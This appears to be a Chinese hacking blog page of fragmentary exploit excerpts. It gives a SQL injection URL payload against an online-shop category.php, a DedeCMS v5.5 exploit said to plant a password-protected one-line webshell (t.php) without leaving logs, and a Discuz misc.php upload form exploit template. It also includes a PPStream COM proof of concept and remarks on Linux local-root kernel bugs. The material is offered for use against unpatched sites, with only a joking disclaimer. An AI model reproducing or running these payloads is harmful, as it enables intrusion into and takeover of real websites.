http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC# goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filte r_attr=-999 Test it : http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC% 23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&fil ter_attr=-999%20OR%20length(session_user())=14%20or%201=2...

官方暂时没出补丁,不过我估计快了 执行成功会在在data/cache下生成t.php一句话小马 密码t,官方最新GBK和utf-8版本存在此漏洞, 此exp的特点是生成t.php得时候不留日志 <?php print_r(‘ +—————————————-+ dedecms v5.5 final getwebshell...

白大王友情提示：非法入侵网站会遭遇躲猫猫和吃窝窝头，大家自重。 第一种方法： 先注册个用户然后把 <form method=”post” action=”   http://www.xxx.com/bbs/misc.php” enctype=”multipart/form-data”> 帖子ID，指定一个存在的帖子即可：<input type=”text” name=”tid” value=”1″ /> <input type=”hidden” name=”action” value=”imme_binding”...

...

【白银时代】备注：POC是放出来了，可是EXP我不知道怎么写……汗 <!– ****************************************************************************** PPStream is the most huge p2p media player in the world. There are two hundred million ppstream users in the world. The vulnerability is exploitable,but I have no time to make it,you could visit my blog for detail.^@^ welcome to http://0dayexpose.blogspot.com/ COM...

...

【白银时代】备注：我没学过Linux，所以没有发言权…… Linux内核漏洞最近几乎是一月一爆，在8月15号才爆了一个几乎通杀所有版本所有内核所有架构的内核漏洞；今天在学生返校的大喜日子里，竟然又爆了一个，通杀内核2.6 < 2.6.19的所有32位Linux，算是google security team给祖国学生的礼物吧。 linux的一个localroot，IIS5/6 FTP的remote...